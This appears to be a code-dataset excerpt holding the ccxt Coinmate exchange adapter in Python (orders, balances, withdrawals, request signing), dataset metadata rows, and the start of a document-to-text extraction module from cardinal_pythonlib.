# timestamp: 1517931722613,
# trailingUpdatedTimestamp: null,
# type: 'BUY',
# price: 5897.24,
# remainingAmount: 0.002367,
# originalAmount: 0.1,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# status: 'CANCELLED',
# orderTradeType: 'LIMIT',
# hidden: False,
# avgPrice: null,
# trailing: False,
# }
#
id = self.safe_string(order, 'id')
timestamp = self.safe_integer(order, 'timestamp')
side = self.safe_string_lower(order, 'type')
priceString = self.safe_string(order, 'price')
amountString = self.safe_string(order, 'originalAmount')
remainingString = self.safe_string_2(order, 'remainingAmount', 'amount')
status = self.parse_order_status(self.safe_string(order, 'status'))
type = self.parse_order_type(self.safe_string(order, 'orderTradeType'))
averageString = self.safe_string(order, 'avgPrice')
marketId = self.safe_string(order, 'currencyPair')
symbol = self.safe_symbol(marketId, market, '_')
clientOrderId = self.safe_string(order, 'clientOrderId')
stopPrice = self.safe_number(order, 'stopPrice')
return self.safe_order({
'id': id,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': priceString,
'stopPrice': stopPrice,
'amount': amountString,
'cost': None,
'average': averageString,
'filled': None,
'remaining': remainingString,
'status': status,
'trades': None,
'info': order,
'fee': None,
}, market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
"""
create a trade order
:param str symbol: unified symbol of the market to create an order in
:param str type: 'market' or 'limit'
:param str side: 'buy' or 'sell'
:param float amount: how much of currency you want to trade in units of base currency
:param float price: the price at which the order is to be fullfilled, in units of the quote currency, ignored in market orders
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: an `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
self.load_markets()
method = 'privatePost' + self.capitalize(side)
request = {
'currencyPair': self.market_id(symbol),
}
if type == 'market':
if side == 'buy':
request['total'] = self.amount_to_precision(symbol, amount) # amount in fiat
else:
request['amount'] = self.amount_to_precision(symbol, amount) # amount in fiat
method += 'Instant'
else:
request['amount'] = self.amount_to_precision(symbol, amount) # amount in crypto
request['price'] = self.price_to_precision(symbol, price)
method += self.capitalize(type)
response = getattr(self, method)(self.extend(request, params))
id = self.safe_string(response, 'data')
return {
'info': response,
'id': id,
}
def fetch_order(self, id, symbol=None, params={}):
"""
fetches information on an order made by the user
:param str|None symbol: unified symbol of the market the order was made in
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
self.load_markets()
request = {
'orderId': id,
}
market = None
if symbol:
market = self.market(symbol)
response = self.privatePostOrderById(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_order(data, market)
def cancel_order(self, id, symbol=None, params={}):
"""
cancels an open order
:param str id: order id
:param str|None symbol: not used by coinmate cancelOrder()
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
# {"error":false,"errorMessage":null,"data":{"success":true,"remainingAmount":0.01}}
request = {'orderId': id}
response = self.privatePostCancelOrderWithInfo(self.extend(request, params))
return {
'info': response,
}
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
else:
self.check_required_credentials()
nonce = str(self.nonce())
auth = nonce + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.urlencode(self.extend({
'clientId': self.uid,
'nonce': nonce,
'publicKey': self.apiKey,
'signature': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is not None:
if 'error' in response:
# {"error":true,"errorMessage":"Minimum Order Size 0.01 ETH","data":null}
if response['error']:
message = self.safe_string(response, 'errorMessage')
feedback = self.id + ' ' + message
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(self.id + ' ' + self.json(response))
if code > 400:
if body:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], body, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)
raise ExchangeError(feedback) # unknown message
raise ExchangeError(self.id + ' ' + body)
| 41.850811
| 155
| 0.517901
|
ge import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class coinmate(Exchange):
def describe(self):
return self.deep_extend(super(coinmate, self).describe(), {
'id': 'coinmate',
'name': 'CoinMate',
'countries': ['GB', 'CZ', 'EU'],
'rateLimit': 1000,
'has': {
'CORS': True,
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'addMargin': False,
'cancelOrder': True,
'createOrder': True,
'createReduceOnlyOrder': False,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRateHistory': False,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchLeverage': False,
'fetchLeverageTiers': False,
'fetchMarkets': True,
'fetchMarkOHLCV': False,
'fetchMyTrades': True,
'fetchOpenInterestHistory': False,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchPosition': False,
'fetchPositions': False,
'fetchPositionsRisk': False,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': False,
'fetchTransactions': True,
'reduceMargin': False,
'setLeverage': False,
'setMarginMode': False,
'setPositionMode': False,
'transfer': False,
'withdraw': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87460806-1c9f3f00-c616-11ea-8c46-a77018a8f3f4.jpg',
'api': 'https://coinmate.io/api',
'www': 'https://coinmate.io',
'fees': 'https://coinmate.io/fees',
'doc': [
'https://coinmate.docs.apiary.io',
'https://coinmate.io/developers',
],
'referral': 'https://coinmate.io?referral=YTFkM1RsOWFObVpmY1ZjMGREQmpTRnBsWjJJNVp3PT0',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'get': [
'orderBook',
'ticker',
'transactions',
'tradingPairs',
],
},
'private': {
'post': [
'balances',
'bitcoinCashWithdrawal',
'bitcoinCashDepositAddresses',
'bitcoinDepositAddresses',
'bitcoinWithdrawal',
'bitcoinWithdrawalFees',
'buyInstant',
'buyLimit',
'cancelOrder',
'cancelOrderWithInfo',
'createVoucher',
'dashDepositAddresses',
'dashWithdrawal',
'ethereumWithdrawal',
'ethereumDepositAddresses',
'litecoinWithdrawal',
'litecoinDepositAddresses',
'openOrders',
'order',
'orderHistory',
'orderById',
'pusherAuth',
'redeemVoucher',
'replaceByBuyLimit',
'replaceByBuyInstant',
'replaceBySellLimit',
'replaceBySellInstant',
'rippleDepositAddresses',
'rippleWithdrawal',
'sellInstant',
'sellLimit',
'transactionHistory',
'traderFees',
'tradeHistory',
'transfer',
'transferHistory',
'unconfirmedBitcoinDeposits',
'unconfirmedBitcoinCashDeposits',
'unconfirmedDashDeposits',
'unconfirmedEthereumDeposits',
'unconfirmedLitecoinDeposits',
'unconfirmedRippleDeposits',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'maker': 0.12 / 100,
'taker': 0.25 / 100,
'tiers': {
'taker': [
[self.parse_number('0'), self.parse_number('0.0035')],
[self.parse_number('10000'), self.parse_number('0.0023')],
[self.parse_number('100000'), self.parse_number('0.0021')],
[self.parse_number('250000'), self.parse_number('0.0020')],
[self.parse_number('500000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0013')],
[self.parse_number('3000000'), self.parse_number('0.0010')],
[self.parse_number('15000000'), self.parse_number('0.0005')],
],
'maker': [
[self.parse_number('0'), self.parse_number('0.003')],
[self.parse_number('10000'), self.parse_number('0.0011')],
[self.parse_number('100000'), self.parse_number('0.0010')],
[self.parse_number('250000'), self.parse_number('0.0008')],
[self.parse_number('500000'), self.parse_number('0.0005')],
[self.parse_number('1000000'), self.parse_number('0.0003')],
[self.parse_number('3000000'), self.parse_number('0.0002')],
[self.parse_number('15000000'), self.parse_number('0')],
],
},
},
},
'options': {
'withdraw': {
'fillResponsefromRequest': True,
'methods': {
'BTC': 'privatePostBitcoinWithdrawal',
'LTC': 'privatePostLitecoinWithdrawal',
'BCH': 'privatePostBitcoinCashWithdrawal',
'ETH': 'privatePostEthereumWithdrawal',
'XRP': 'privatePostRippleWithdrawal',
'DASH': 'privatePostDashWithdrawal',
'DAI': 'privatePostDaiWithdrawal',
},
},
},
'exceptions': {
'exact': {
'No order with given ID': OrderNotFound,
},
'broad': {
'Not enough account balance available': InsufficientFunds,
'Incorrect order ID': InvalidOrder,
'Minimum Order Size ': InvalidOrder,
'TOO MANY REQUESTS': RateLimitExceeded,
'Access denied.': AuthenticationError,
},
},
'precisionMode': TICK_SIZE,
})
def fetch_markets(self, params={}):
response = self.publicGetTradingPairs(params)
data = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(data)):
market = data[i]
id = self.safe_string(market, 'name')
baseId = self.safe_string(market, 'firstCurrency')
quoteId = self.safe_string(market, 'secondCurrency')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'active': None,
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number(self.parse_precision(self.safe_string(market, 'lotDecimals'))),
'price': self.parse_number(self.parse_precision(self.safe_string(market, 'priceDecimals'))),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': self.safe_number(market, 'minAmount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
return result
def parse_balance(self, response):
balances = self.safe_value(response, 'data', {})
result = {'info': response}
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
code = self.safe_currency_code(currencyId)
balance = self.safe_value(balances, currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available')
account['used'] = self.safe_string(balance, 'reserved')
account['total'] = self.safe_string(balance, 'balance')
result[code] = account
return self.safe_balance(result)
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostBalances(params)
return self.parse_balance(response)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
'groupByPriceLimit': 'False',
}
response = self.publicGetOrderBook(self.extend(request, params))
orderbook = response['data']
timestamp = self.safe_timestamp(orderbook, 'timestamp')
return self.parse_order_book(orderbook, symbol, timestamp, 'bids', 'asks', 'price', 'amount')
def fetch_ticker(self, symbol, params={}):
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
}
response = self.publicGetTicker(self.extend(request, params))
ticker = self.safe_value(response, 'data')
timestamp = self.safe_timestamp(ticker, 'timestamp')
last = self.safe_number(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'ask'),
'vwap': None,
'askVolume': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_number(ticker, 'amount'),
'quoteVolume': None,
'info': ticker,
}
def fetch_transactions(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {
'limit': 1000,
}
if limit is not None:
request['limit'] = limit
if since is not None:
request['timestampFrom'] = since
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
response = self.privatePostTransferHistory(self.extend(request, params))
items = response['data']
return self.parse_transactions(items, None, since, limit)
def parse_transaction_status(self, status):
statuses = {
'COMPLETED': 'ok',
'WAITING': 'pending',
'SENT': 'pending',
'CREATED': 'pending',
'OK': 'ok',
'NEW': 'pending',
'CANCELED': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
timestamp = self.safe_integer(transaction, 'timestamp')
amount = self.safe_number(transaction, 'amount')
fee = self.safe_number(transaction, 'fee')
txid = self.safe_string(transaction, 'txid')
address = self.safe_string(transaction, 'destination')
tag = self.safe_string(transaction, 'destinationTag')
currencyId = self.safe_string(transaction, 'amountCurrency')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'transferType')
status = self.parse_transaction_status(self.safe_string(transaction, 'transferStatus'))
id = self.safe_string_2(transaction, 'transactionId', 'id')
network = self.safe_string(transaction, 'walletType')
return {
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'currency': code,
'amount': amount,
'type': type,
'txid': txid,
'network': network,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'status': status,
'fee': {
'cost': fee,
'currency': code,
},
'info': transaction,
}
def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
self.load_markets()
currency = self.currency(code)
withdrawOptions = self.safe_value(self.options, 'withdraw', {})
methods = self.safe_value(withdrawOptions, 'methods', {})
method = self.safe_string(methods, code)
if method is None:
allowedCurrencies = list(methods.keys())
raise ExchangeError(self.id + ' withdraw() only allows withdrawing the following currencies: ' + ', '.join(allowedCurrencies))
request = {
'amount': self.currency_to_precision(code, amount),
'address': address,
}
if tag is not None:
request['destinationTag'] = tag
response = getattr(self, method)(self.extend(request, params))
data = self.safe_value(response, 'data')
transaction = self.parse_transaction(data, currency)
fillResponseFromRequest = self.safe_value(withdrawOptions, 'fillResponseFromRequest', True)
if fillResponseFromRequest:
transaction['amount'] = amount
transaction['currency'] = code
transaction['address'] = address
transaction['tag'] = tag
transaction['type'] = 'withdrawal'
transaction['status'] = 'pending'
return transaction
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
if limit is None:
limit = 1000
request = {
'limit': limit,
}
if symbol is not None:
market = self.market(symbol)
request['currencyPair'] = market['id']
if since is not None:
request['timestampFrom'] = since
response = self.privatePostTradeHistory(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, None, since, limit)
def parse_trade(self, trade, market=None):
marketId = self.safe_string(trade, 'currencyPair')
market = self.safe_market(marketId, market, '_')
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
side = self.safe_string_lower_2(trade, 'type', 'tradeType')
type = self.safe_string_lower(trade, 'orderType')
orderId = self.safe_string(trade, 'orderId')
id = self.safe_string(trade, 'transactionId')
timestamp = self.safe_integer_2(trade, 'timestamp', 'createdTimestamp')
fee = None
feeCostString = self.safe_string(trade, 'fee')
if feeCostString is not None:
fee = {
'cost': feeCostString,
'currency': market['quote'],
}
takerOrMaker = self.safe_string(trade, 'feeType')
takerOrMaker = 'maker' if (takerOrMaker == 'MAKER') else 'taker'
return self.safe_trade({
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'type': type,
'side': side,
'order': orderId,
'takerOrMaker': takerOrMaker,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
'minutesIntoHistory': 10,
}
response = self.publicGetTransactions(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def fetch_trading_fee(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
response = self.privatePostTraderFees(self.extend(request, params))
data = self.safe_value(response, 'data', {})
makerString = self.safe_string(data, 'maker')
takerString = self.safe_string(data, 'taker')
maker = self.parse_number(Precise.string_div(makerString, '100'))
taker = self.parse_number(Precise.string_div(takerString, '100'))
return {
'info': data,
'symbol': symbol,
'maker': maker,
'taker': taker,
'percentage': True,
'tierBased': True,
}
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privatePostOpenOrders(self.extend({}, params))
extension = {'status': 'open'}
return self.parse_orders(response['data'], None, since, limit, extension)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
if limit is not None:
request['limit'] = limit
response = self.privatePostOrderHistory(self.extend(request, params))
return self.parse_orders(response['data'], market, since, limit)
def parse_order_status(self, status):
statuses = {
'FILLED': 'closed',
'CANCELLED': 'canceled',
'PARTIALLY_FILLED': 'open',
'OPEN': 'open',
}
return self.safe_string(statuses, status, status)
def parse_order_type(self, type):
types = {
'LIMIT': 'limit',
'MARKET': 'market',
}
return self.safe_string(types, type, type)
def parse_order(self, order, market=None):
#
# limit sell
#
# {
# id: 781246605,
# timestamp: 1584480015133,
# trailingUpdatedTimestamp: null,
# type: 'SELL',
# currencyPair: 'ETH_BTC',
# price: 0.0345,
# amount: 0.01,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# orderTradeType: 'LIMIT',
# hidden: False,
# trailing: False,
# clientOrderId: null
# }
#
# limit buy
#
# {
# id: 67527001,
# timestamp: 1517931722613,
# trailingUpdatedTimestamp: null,
# type: 'BUY',
# price: 5897.24,
# remainingAmount: 0.002367,
# originalAmount: 0.1,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# status: 'CANCELLED',
# orderTradeType: 'LIMIT',
# hidden: False,
# avgPrice: null,
# trailing: False,
# }
#
id = self.safe_string(order, 'id')
timestamp = self.safe_integer(order, 'timestamp')
side = self.safe_string_lower(order, 'type')
priceString = self.safe_string(order, 'price')
amountString = self.safe_string(order, 'originalAmount')
remainingString = self.safe_string_2(order, 'remainingAmount', 'amount')
status = self.parse_order_status(self.safe_string(order, 'status'))
type = self.parse_order_type(self.safe_string(order, 'orderTradeType'))
averageString = self.safe_string(order, 'avgPrice')
marketId = self.safe_string(order, 'currencyPair')
symbol = self.safe_symbol(marketId, market, '_')
clientOrderId = self.safe_string(order, 'clientOrderId')
stopPrice = self.safe_number(order, 'stopPrice')
return self.safe_order({
'id': id,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': priceString,
'stopPrice': stopPrice,
'amount': amountString,
'cost': None,
'average': averageString,
'filled': None,
'remaining': remainingString,
'status': status,
'trades': None,
'info': order,
'fee': None,
}, market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
method = 'privatePost' + self.capitalize(side)
request = {
'currencyPair': self.market_id(symbol),
}
if type == 'market':
if side == 'buy':
request['total'] = self.amount_to_precision(symbol, amount) # amount in fiat
else:
request['amount'] = self.amount_to_precision(symbol, amount) # amount in fiat
method += 'Instant'
else:
request['amount'] = self.amount_to_precision(symbol, amount) # amount in crypto
request['price'] = self.price_to_precision(symbol, price)
method += self.capitalize(type)
response = getattr(self, method)(self.extend(request, params))
id = self.safe_string(response, 'data')
return {
'info': response,
'id': id,
}
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'orderId': id,
}
market = None
if symbol:
market = self.market(symbol)
response = self.privatePostOrderById(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_order(data, market)
def cancel_order(self, id, symbol=None, params={}):
# {"error":false,"errorMessage":null,"data":{"success":true,"remainingAmount":0.01}}
request = {'orderId': id}
response = self.privatePostCancelOrderWithInfo(self.extend(request, params))
return {
'info': response,
}
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
else:
self.check_required_credentials()
nonce = str(self.nonce())
auth = nonce + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.urlencode(self.extend({
'clientId': self.uid,
'nonce': nonce,
'publicKey': self.apiKey,
'signature': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is not None:
if 'error' in response:
# {"error":true,"errorMessage":"Minimum Order Size 0.01 ETH","data":null}
if response['error']:
message = self.safe_string(response, 'errorMessage')
feedback = self.id + ' ' + message
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(self.id + ' ' + self.json(response))
if code > 400:
if body:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], body, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)
raise ExchangeError(feedback) # unknown message
raise ExchangeError(self.id + ' ' + body)
| true
| true
|
1c447420694ed8036a9668092025459314e6c7cc
| 51,718
|
py
|
Python
|
cardinal_pythonlib/extract_text.py
|
bopopescu/pythonlib
|
9c2187d6092ba133342ca3374eb7c86f9d296c30
|
[
"Apache-2.0"
] | null | null | null |
cardinal_pythonlib/extract_text.py
|
bopopescu/pythonlib
|
9c2187d6092ba133342ca3374eb7c86f9d296c30
|
[
"Apache-2.0"
] | null | null | null |
cardinal_pythonlib/extract_text.py
|
bopopescu/pythonlib
|
9c2187d6092ba133342ca3374eb7c86f9d296c30
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# cardinal_pythonlib/extract_text.py
"""
===============================================================================
Original code copyright (C) 2009-2020 Rudolf Cardinal (rudolf@pobox.com).
This file is part of cardinal_pythonlib.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
**Converts a bunch of stuff to text, either from external files or from
in-memory binary objects (BLOBs).**
Prerequisites:
.. code-block:: bash
sudo apt-get install antiword
pip install docx pdfminer
- Author: Rudolf Cardinal (rudolf@pobox.com)
- Created: Feb 2015
- Last update: 24 Sep 2015
See also:
- Word
- http://stackoverflow.com/questions/125222
- http://stackoverflow.com/questions/42482
- PDF
- http://stackoverflow.com/questions/25665
- https://pypi.python.org/pypi/slate
- http://stackoverflow.com/questions/5725278
- RTF
- unrtf
- http://superuser.com/questions/243084/rtf-to-txt-on-unix
- Multi-purpose:
- https://pypi.python.org/pypi/fulltext/
- https://media.readthedocs.org/pdf/textract/latest/textract.pdf
- DOCX
- http://etienned.github.io/posts/extract-text-from-word-docx-simply/
"""
# =============================================================================
# Imports
# =============================================================================
import argparse
from io import StringIO # Python 3
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import textwrap
from typing import (
BinaryIO, Dict, Generator, Iterable, Iterator, List, Optional, Union,
)
from xml.etree import ElementTree as ElementTree
# ... cElementTree used to be the fast implementation; now ElementTree is fast
# and cElementTree is deprecated; see
# https://docs.python.org/3.4/library/xml.etree.elementtree.html
import zipfile
import bs4
import prettytable
from semantic_version import Version
# import texttable # ... can't deal with Unicode properly
from cardinal_pythonlib.logs import get_brace_style_log_with_null_handler
try:
import chardet
from chardet.universaldetector import UniversalDetector
except ImportError:
chardet = None
UniversalDetector = None
try:
# noinspection PyPackageRequirements
import docx # pip install python-docx (NOT docx) - BUT python-docx requires lxml which has C dependencies # noqa
# noinspection PyPackageRequirements
import docx.document
# noinspection PyPackageRequirements
import docx.oxml.table
# noinspection PyPackageRequirements
import docx.oxml.text.paragraph
# noinspection PyPackageRequirements
import docx.table
# noinspection PyPackageRequirements
import docx.text.paragraph
DOCX_DOCUMENT_TYPE = "docx.document.Document"
DOCX_TABLE_TYPE = Union["docx.table.Table", "CustomDocxTable"]
DOCX_CONTAINER_TYPE = Union[DOCX_DOCUMENT_TYPE, "docx.table._Cell"]
DOCX_BLOCK_ITEM_TYPE = Union["docx.text.paragraph.Paragraph",
"docx.table.Table"]
except ImportError:
docx = None
DOCX_DOCUMENT_TYPE = None
DOCX_TABLE_TYPE = "CustomDocxTable"
DOCX_CONTAINER_TYPE = None
DOCX_BLOCK_ITEM_TYPE = None
try:
import docx2txt # pip install docx2txt
except ImportError:
docx2txt = None
try:
# noinspection PyPackageRequirements
import pdfminer # pip install pdfminer
# noinspection PyPackageRequirements
import pdfminer.pdfinterp
# noinspection PyPackageRequirements
import pdfminer.converter
# noinspection PyPackageRequirements
import pdfminer.layout
# noinspection PyPackageRequirements
import pdfminer.pdfpage
except ImportError:
pdfminer = None
try:
# noinspection PyPackageRequirements
import pyth # pip install pyth (PYTHON 2 ONLY; https://pypi.python.org/pypi/pyth/0.5.4) # noqa
# noinspection PyPackageRequirements
import pyth.plugins.rtf15.reader
# noinspection PyPackageRequirements
import pyth.plugins.plaintext.writer
except ImportError:
pyth = None
log = get_brace_style_log_with_null_handler(__name__)
# =============================================================================
# Constants
# =============================================================================
AVAILABILITY = 'availability'
CONVERTER = 'converter'
DEFAULT_WIDTH = 120
DEFAULT_MIN_COL_WIDTH = 15
SYS_ENCODING = sys.getdefaultencoding()
ENCODING = "utf-8"
# =============================================================================
# External tool map
# =============================================================================
tools = {
'antiword': shutil.which('antiword'), # sudo apt-get install antiword
'pdftotext': shutil.which('pdftotext'), # core part of Linux?
'strings': shutil.which('strings'), # part of standard Unix
'strings2': shutil.which('strings2'),
# ... Windows: https://technet.microsoft.com/en-us/sysinternals/strings.aspx # noqa
# ... Windows: http://split-code.com/strings2.html
'unrtf': shutil.which('unrtf'), # sudo apt-get install unrtf
}
def does_unrtf_support_quiet() -> bool:
"""
The unrtf tool supports the '--quiet' argument from a version that I'm not
quite sure of, where ``0.19.3 < version <= 0.21.9``. We check against
0.21.9 here.
"""
required_unrtf_version = Version("0.21.9")
# ... probably: http://hg.savannah.gnu.org/hgweb/unrtf/
# ... 0.21.9 definitely supports --quiet
# ... 0.19.3 definitely doesn't support it
unrtf_filename = shutil.which('unrtf')
if not unrtf_filename:
return False
p = subprocess.Popen(["unrtf", "--version"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, err_bytes = p.communicate()
text = err_bytes.decode(sys.getdefaultencoding())
lines = text.split()
if len(lines) < 1:
return False
version_str = lines[0]
unrtf_version = Version(version_str)
return unrtf_version >= required_unrtf_version
UNRTF_SUPPORTS_QUIET = does_unrtf_support_quiet()
def update_external_tools(tooldict: Dict[str, str]) -> None:
"""
Update the global map of tools.
Args:
tooldict: dictionary whose keys are tools names and whose values are
paths to the executables
"""
global tools
tools.update(tooldict)
# =============================================================================
# Text-processing config class
# =============================================================================
class TextProcessingConfig(object):
"""
Class to manage control parameters for text extraction, without having
to pass a lot of mysterious ``**kwargs`` around and lose track of what it
means.
All converter functions take one of these objects as a parameter.
"""
def __init__(self,
encoding: str = None,
width: int = DEFAULT_WIDTH,
min_col_width: int = DEFAULT_MIN_COL_WIDTH,
plain: bool = False,
semiplain: bool = False,
docx_in_order: bool = True,
horizontal_char="─",
vertical_char="│",
junction_char="┼",
plain_table_start: str = None,
plain_table_end: str = None,
plain_table_col_boundary: str = None,
plain_table_row_boundary: str = None,
rstrip: bool = True) -> None:
"""
Args:
encoding:
optional text file encoding to try in addition to
:func:`sys.getdefaultencoding`.
width:
overall word-wrapping width
min_col_width:
minimum column width for tables
plain:
as plain as possible (e.g. for natural language processing);
see :func:`docx_process_table`.
semiplain:
quite plain, but with some ASCII art representation of the
table structure.
docx_in_order:
for DOCX files: if ``True``, process paragraphs and tables in
the order they occur; if ``False``, process all paragraphs
followed by all tables
rstrip:
Right-strip whitespace from all lines?
horizontal_char:
horizontal character to use with PrettyTable, e.g. ``-`` or
``─``
vertical_char:
vertical character to use with PrettyTable, e.g. ``|`` or
``│``
junction_char:
junction character to use with PrettyTable, e.g. ``+`` or
``┼``
plain_table_start:
table start line to use with ``plain=True``
plain_table_end:
table end line to use with ``plain=True``
plain_table_col_boundary:
boundary between columns to use with ``plain==True``
plain_table_row_boundary:
boundary between rows to use with ``plain==True``
Example of a DOCX table processed with:
- ``plain=False, semiplain=False``
.. code-block:: none
┼─────────────┼─────────────┼
│ Row 1 col 1 │ Row 1 col 2 │
┼─────────────┼─────────────┼
│ Row 2 col 1 │ Row 2 col 2 │
┼─────────────┼─────────────┼
- ``plain=False, semiplain=True``
.. code-block:: none
─────────────────────────────
Row 1 col 1
─────────────────────────────
Row 1 col 2
